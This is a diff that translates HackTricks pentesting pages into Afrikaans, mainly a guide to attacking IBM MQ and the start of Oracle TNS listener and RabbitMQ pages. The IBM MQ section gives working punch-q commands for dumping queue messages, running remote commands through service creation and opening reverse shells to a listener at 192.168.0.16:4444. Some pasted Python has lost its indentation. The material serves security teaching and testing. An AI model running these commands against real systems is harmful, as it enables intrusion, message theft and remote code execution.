[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). For Linux x86_64 it is **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**. -3. Decompress (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`). -4. Run `sudo ./mqlicense.sh` to accept licenses terms. +1. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/). +2. Laai IBM MQ-biblioteke af vanaf [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Vir Linux x86_64 is dit **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**. +3. Ontplooi (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`). +4. Voer `sudo ./mqlicense.sh` uit om lisensievoorwaardes te aanvaar. ->If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110): +>As jy onder Kali Linux is, wysig die lêer `mqlicense.sh`: verwyder/kommentaar die volgende lyne (tussen lyne 105-110): > >```bash ->if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] -> then +>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] +> then > echo "ERROR: This package is incompatible with this system" > echo " This package was built for ${BUILD_PLATFORM}" > exit 1 >fi >``` -5. Install these packages: - +5. Installeer hierdie pakkette: ```bash sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm ``` +6. Voeg dan tijdelik die `.so` lêers by LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **voordat** jy ander gereedskap gebruik wat van hierdie afhanklikhede gebruik maak. -6. Then, temporary add the `.so` files to LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **before** running other tools using these dependencies. +Dan kan jy die projek [**pymqi**](https://github.com/dsuch/pymqi) kloon: dit bevat interessante kodefragmente, konstantes, ... Of jy kan die biblioteek direk installeer met: `pip install pymqi`. -Then, you can clone the project [**pymqi**](https://github.com/dsuch/pymqi): it contains interesting code snippets, constants, ... Or you can directly install the library with: `pip install pymqi`. +### Gebruik van punch-q -### Using punch-q +#### Met Docker -#### With Docker +Gebruik eenvoudig: `sudo docker run --rm -ti leonjza/punch-q`. -Simply use: `sudo docker run --rm -ti leonjza/punch-q`. +#### Sonder Docker -#### Without Docker +Kloon die projek [**punch-q**](https://github.com/sensepost/punch-q) en volg dan die leesmy vir installasie (`pip install -r requirements.txt && python3 setup.py install`). -Clone the project [**punch-q**](https://github.com/sensepost/punch-q) then follow the readme for installation (`pip install -r requirements.txt && python3 setup.py install`). +Daarna kan dit gebruik word met die `punch-q` opdrag. -After, it can be used with `punch-q` command. +## Enumerasie -## Enumeration +Jy kan probeer om die **queue bestuurder naam, die gebruikers, die kanale en die rye** te enumereer met **punch-q** of **pymqi**. -You can try to enumerate the **queue manager name, the users, the channels and the queues** with **punch-q** or **pymqi**. - -### Queue Manager - -Sometimes, there is no protection against getting the Queue Manager name: +### Queue Bestuurder +Soms is daar geen beskerming teen die verkryging van die Queue Bestuurder naam nie: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name Queue Manager name: MYQUEUEMGR ``` +### Kanale -### Channels - -**punch-q** is using an internal (modifiable) wordlist to find existing channels. Usage example: - +**punch-q** maak gebruik van 'n interne (veranderbare) woordelys om bestaande kanale te vind. Gebruik voorbeeld: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels "DEV.ADMIN.SVRCONN" exists and was authorised. "SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised. "SYSTEM.DEF.SVRCONN" might exist, but user was not authorised. ``` +Dit gebeur dat sommige IBM MQ-instanties **ongeagte** MQ-versoeke aanvaar, so `--username / --password` is nie nodig nie. Natuurlik kan toegangsregte ook verskil. -It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so `--username / --password` is not needed. Of course, access rights can also vary. - -As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels. - -The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**: +Sodra ons een kanaalnaam kry (hier: `DEV.ADMIN.SVRCONN`), kan ons al die ander kanale opnoem. +Die opnoeming kan basies gedoen word met hierdie kodefragment `code/examples/dis_channels.py` van **pymqi**: ```python import logging import pymqi @@ -126,24 +119,22 @@ qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) pcf = pymqi.PCFExecute(qmgr) try: - response = pcf.MQCMD_INQUIRE_CHANNEL(args) +response = pcf.MQCMD_INQUIRE_CHANNEL(args) except pymqi.MQMIError as e: - if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME: - logging.info('No channels matched prefix `%s`' % prefix) - else: - raise +if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME: +logging.info('No channels matched prefix `%s`' % prefix) else: - for channel_info in response: - channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME] - logging.info('Found channel `%s`' % channel_name) +raise +else: +for channel_info in response: +channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME] +logging.info('Found channel `%s`' % channel_name) qmgr.disconnect() ``` - -... But **punch-q** also embed that part (with more infos!). -It can be launch with: - +... Maar **punch-q** bevat ook daardie deel (met meer inligting!). +Dit kan geloods word met: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*' Showing channels with prefix: "*"... @@ -164,13 +155,11 @@ Showing channels with prefix: "*"... | SYSTEM.DEF.SVRCONN | Server-connection | | | | | | | SYSTEM.DEF.CLNTCONN | Client-connection | | | | | | ``` +### Rye -### Queues - -There is a code snippet with **pymqi** (`dis_queues.py`) but **punch-q** permits to retrieve more pieces of info about the queues: - +Daar is 'n kodefragment met **pymqi** (`dis_queues.py`), maar **punch-q** maak dit moontlik om meer inligting oor die rye te bekom: ```bash - ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*' +❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*' Showing queues with prefix: "*"... | Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description | | | | | | | GR Name | eue Nam | | @@ -190,13 +179,11 @@ Showing queues with prefix: "*"... | 9 | | | | | | | | # Truncated ``` +## Uitbuiting -## Exploit - -### Dump messages - -You can target queue(s)/channel(s) to sniff out / dump messages from them (non-destructive operation). *Examples:* +### Stort boodskappe +Jy kan 'n teiken(s)/kanaal(s) aanval om boodskappe daaruit te snuffel / stort (nie-destruktiewe operasie). *Voorbeelde:* ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff ``` @@ -204,40 +191,36 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump ``` +**Moenie huiwer om op alle geïdentifiseerde toue te itereer nie.** -**Do not hesitate to iterate on all identified queues.** +### Kode-uitvoering -### Code execution - -> Some details before continuing: IBM MQ can be controlled though multiple ways: MQSC, PCF, Control Command. Some general lists can be found in [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison). -> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) is what we are focused on to interact remotely with the instance. **punch-q** and furthermore **pymqi** are based on PCF interactions. -> -> You can find a list of PCF commands: -> * [From PCF documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), and -> * [from constants](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes). -> -> One interesting command is `MQCMD_CREATE_SERVICE` and its documentation is available [here](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). It takes as argument a `StartCommand` pointing to a local program on the instance (example: `/bin/sh`). +> 'n Paar besonderhede voordat ons voortgaan: IBM MQ kan op verskeie maniere beheer word: MQSC, PCF, Beheeropdrag. 'n Paar algemene lysies kan gevind word in die [IBM MQ-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison). +> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) is waarop ons fokus om op afstand met die instansie te kommunikeer. **punch-q** en verder **pymqi** is gebaseer op PCF-interaksies. > -> There is also a warning of the command in the docs: *"Attention: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."* -> -> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.* +> Jy kan 'n lys van PCF-opdragte vind: +> * [Vanaf die PCF-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), en +> * [vanaf konstantes](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes). +> +> Een interessante opdrag is `MQCMD_CREATE_SERVICE` en die dokumentasie is beskikbaar [hier](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Dit neem 'n `StartCommand` as argument wat verwys na 'n plaaslike program op die instansie (voorbeeld: `/bin/sh`). +> +> Daar is ook 'n waarskuwing oor die opdrag in die dokumentasie: *"Aandag: Hierdie opdrag stel 'n gebruiker in staat om 'n willekeurige opdrag met mqm-bevoegdheid uit te voer. As regte verleen word om hierdie opdrag te gebruik, kan 'n kwaadwillige of sorgelose gebruiker 'n diens definieer wat jou stelsels of data beskadig, byvoorbeeld deur noodsaaklike lêers te verwyder."* +> +> *Let wel: altyd volgens die IBM MQ-dokumentasie (Administrasie Verwysing), is daar ook 'n HTTP-eindpunt by `/admin/action/qmgr/{qmgrName}/mqsc` om die ekwivalente MQSC-opdrag vir diensskepping (`DEFINE SERVICE`) uit te voer. Hierdie aspek word nog nie hier gedek nie.* -The service creation / deletion with PCF for remote program execution can be done by **punch-q**: - -**Example 1** +Die skepping / verwydering van 'n diens met PCF vir uitvoering van 'n program op afstand kan gedoen word deur **punch-q**: +**Voorbeeld 1** ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id" ``` - -> In the logs of IBM MQ, you can read the command is successfully executed: -> +> In die logboeke van IBM MQ kan jy lees dat die opdrag suksesvol uitgevoer is: +> > ```bash -> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)] +> 2023-10-10T19:13:01.713Z AMQ5030I: Die opdrag '808544aa7fc94c48' het begin. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)] > ``` -You can also enumerate existing programs on the machine (here `/bin/doesnotexist` ... does not exist): - +Jy kan ook bestaande programme op die rekenaar opnoem (hier `/bin/doesnotexist` ... bestaan nie): ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg s "whatever" @@ -252,36 +235,30 @@ Giving the service 0 second(s) to live... Cleaning up service... Done ``` +**Wees bewus dat die program-lancering asinkronies is. Jy het dus 'n tweede item nodig om die uitbuiting te benut** ***(luisteraar vir omgekeerde dop, lêer-skepping op verskillende diens, data-eksfiltrering deur middel van netwerk ...)*** -**Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit** ***(listener for reverse shell, file creation on different service, data exfiltration through network ...)*** +**Voorbeeld 2** -**Example 2** +Vir 'n maklike omgekeerde dop, bied **punch-q** ook twee omgekeerde dop-ladinge aan: -For easy reverse shell, **punch-q** proposes also two reverse shell payloads : +* Een met bash +* Een met perl -* One with bash -* One with perl - -*Of course you can build a custom one with the `execute` command.* - -For bash: +*Natuurlik kan jy 'n aangepaste een bou met die `uitvoer`-opdrag.* +Vir bash: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444 ``` - -For perl: - +Vir perl: ```bash ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444 ``` +### Aangepaste PCF -### Custom PCF - -You can dig into the IBM MQ documentation and directly use **pymqi** python library to test specific PCF command not implemented in **punch-q**. - -**Example:** +Jy kan in die IBM MQ-dokumentasie duik en direk die **pymqi** Python-biblioteek gebruik om 'n spesifieke PCF-opdrag te toets wat nie geïmplementeer is in **punch-q** nie. +**Voorbeeld:** ```python import pymqi @@ -297,26 +274,25 @@ qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) pcf = pymqi.PCFExecute(qmgr) try: - # Replace here with your custom PCF args and command - # The constants can be found in pymqi/code/pymqi/CMQCFC.py - args = {pymqi.CMQCFC.xxxxx: "value"} - response = pcf.MQCMD_CUSTOM_COMMAND(args) +# Replace here with your custom PCF args and command +# The constants can be found in pymqi/code/pymqi/CMQCFC.py +args = {pymqi.CMQCFC.xxxxx: "value"} +response = pcf.MQCMD_CUSTOM_COMMAND(args) except pymqi.MQMIError as e: - print("Error") +print("Error") else: - # Process response +# Process response qmgr.disconnect() ``` +As jy nie die konstante name kan vind nie, kan jy verwys na die [IBM MQ-dokumentasie](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors). -If you cannot find the constant names, you can refer to the [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors). - -> *Example for [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). It needs the parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) which can be `*` (Doc: ):* -> +> *Voorbeeld vir [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Desimaal = 73). Dit vereis die parameter `MQCA_CLUSTER_NAME` (Desimaal = 2029) wat `*` kan wees (Doc: ):* +> > ```python > import pymqi -> +> > queue_manager = 'MYQUEUEMGR' > channel = 'DEV.ADMIN.SVRCONN' > host = '172.17.0.2' @@ -324,10 +300,10 @@ If you cannot find the constant names, you can refer to the [IBM MQ documentatio > conn_info = '%s(%s)' % (host, port) > user = 'admin' > password = 'passw0rd' -> +> > qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password) > pcf = pymqi.PCFExecute(qmgr) -> +> > try: > args = {2029: "*"} > response = pcf.MQCMD_REFRESH_CLUSTER(args) @@ -335,37 +311,33 @@ If you cannot find the constant names, you can refer to the [IBM MQ documentatio > print("Error") > else: > print(response) -> +> > qmgr.disconnect() > ``` -## Testing environment +## Toetsomgewing -If you want to test the IBM MQ behavior and exploits, you can set up a local environment based on Docker: - -1. Having an account on ibm.com and cloud.ibm.com. -2. Create a containerized IBM MQ with: +As jy die IBM MQ-gedrag en aanvalle wil toets, kan jy 'n plaaslike omgewing opstel gebaseer op Docker: +1. Skep 'n rekening op ibm.com en cloud.ibm.com. +2. Skep 'n gekonteneerde IBM MQ met: ```bash sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2 sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2 ``` +Standaard is die verifikasie geaktiveer, die gebruikersnaam is `admin` en die wagwoord is `passw0rd` (Omgewingsveranderlike `MQ_ADMIN_PASSWORD`). +Hier is die wagkamer se naam ingestel op `MYQUEUEMGR` (veranderlike `MQ_QMGR_NAME`). -By default, the authentication is enabled, the username is `admin` and the password is `passw0rd` (Environment variable `MQ_ADMIN_PASSWORD`). -Here, the queue manager name has been set to `MYQUEUEMGR` (variable `MQ_QMGR_NAME`). - -You should have the IBM MQ up and running with its ports exposed: - +Jy moet IBM MQ aan die gang hê met sy poorte blootgestel: ```bash ❯ sudo docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq ``` +> Die ou weergawe van IBM MQ docker-beelde is beskikbaar by: https://hub.docker.com/r/ibmcom/mq/. -> The old version of IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/. +## Verwysings -## References - -* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec) +* [mgeeky se gist - "Praktiese IBM MQ Penetration Testing notas"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec) * [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf) -* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq) +* [IBM MQ dokumentasie](https://www.ibm.com/docs/en/ibm-mq) diff --git a/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index 0d4bc7fc2..7318a5bda 100644 --- a/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -1,89 +1,85 @@ -# 1521,1522-1529 - Pentesting Oracle TNS Listener +# 1521,1522-1529 - Pentesting Oracle TNS Luisteraar
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)). - -When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-). +Oracle-databasis (Oracle DB) is 'n relasionele databasisbestuurstelsel (RDBMS) van die Oracle Corporation (van [hier](https://www.techopedia.com/definition/8711/oracle-database)). +Wanneer jy Oracle ondersoek, is die eerste stap om met die TNS-luisteraar te praat wat gewoonlik op die verstekpoort (1521/TCP) is (jy kan ook sekondêre luisteraars op 1522-1529 kry). ``` 1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows) 1748/tcp open oracle-tns Oracle TNS Listener ``` +## Opsomming -## Summary +1. **Weergawe-opsomming**: Identifiseer weergaweinligting om na bekende kwesbaarhede te soek. +2. **TNS Listener Bruteforce**: Soms nodig om kommunikasie tot stand te bring. +3. **SID Naam Opsomming/Bruteforce**: Ontdek databasisname (SID). +4. **Legitimasie Bruteforce**: Probeer toegang verkry tot ontdekte SID. +5. **Kode-uitvoering**: Probeer kode op die stelsel uitvoer. -1. **Version Enumeration**: Identify version information to search for known vulnerabilities. -2. **TNS Listener Bruteforce**: Sometimes necessary to establish communication. -3. **SID Name Enumeration/Bruteforce**: Discover database names (SID). -4. **Credential Bruteforce**: Attempt to access discovered SID. -5. **Code Execution**: Attempt to run code on the system. +Om die MSF-orakelmodules te gebruik, moet u sekere afhanklikhede installeer: [**Installasie**](oracle-pentesting-requirements-installation.md) -In order to user MSF oracle modules you need to install some dependencies: [**Installation**](oracle-pentesting-requirements-installation.md) +## Plasings -## Posts - -Check these posts: +Kyk na hierdie plasings: * [https://secybr.com/posts/oracle-pentesting-best-practices/](https://secybr.com/posts/oracle-pentesting-best-practices/) * [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) * [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/) * [http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Oracle #Protocol Abbreviation if there is one. Port_Number: 1521 #Comma separated if there is more than one. Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Oracle - Note: | - Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation +Name: Notes +Description: Notes for Oracle +Note: | +Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation - #great oracle enumeration tool - navigate to https://github.com/quentinhardy/odat/releases/ - download the latest - tar -xvf odat-linux-libc2.12-x86_64.tar.gz - cd odat-libc2.12-x86_64/ - ./odat-libc2.12-x86_64 all -s 10.10.10.82 +#great oracle enumeration tool +navigate to https://github.com/quentinhardy/odat/releases/ +download the latest +tar -xvf odat-linux-libc2.12-x86_64.tar.gz +cd odat-libc2.12-x86_64/ +./odat-libc2.12-x86_64 all -s 10.10.10.82 - for more details check https://github.com/quentinhardy/odat/wiki +for more details check https://github.com/quentinhardy/odat/wiki - https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener +https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener Entry_2: - Name: Nmap - Description: Nmap with Oracle Scripts - Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP} +Name: Nmap +Description: Nmap with Oracle Scripts +Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/network-services-pentesting/15672-pentesting-rabbitmq-management.md index 6f4e8223b..1ef63da09 100644 --- a/network-services-pentesting/15672-pentesting-rabbitmq-management.md +++ b/network-services-pentesting/15672-pentesting-rabbitmq-management.md @@ -1,52 +1,49 @@ -# 15672 - Pentesting RabbitMQ Management +# 15672 - Pentesting RabbitMQ-bestuur
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
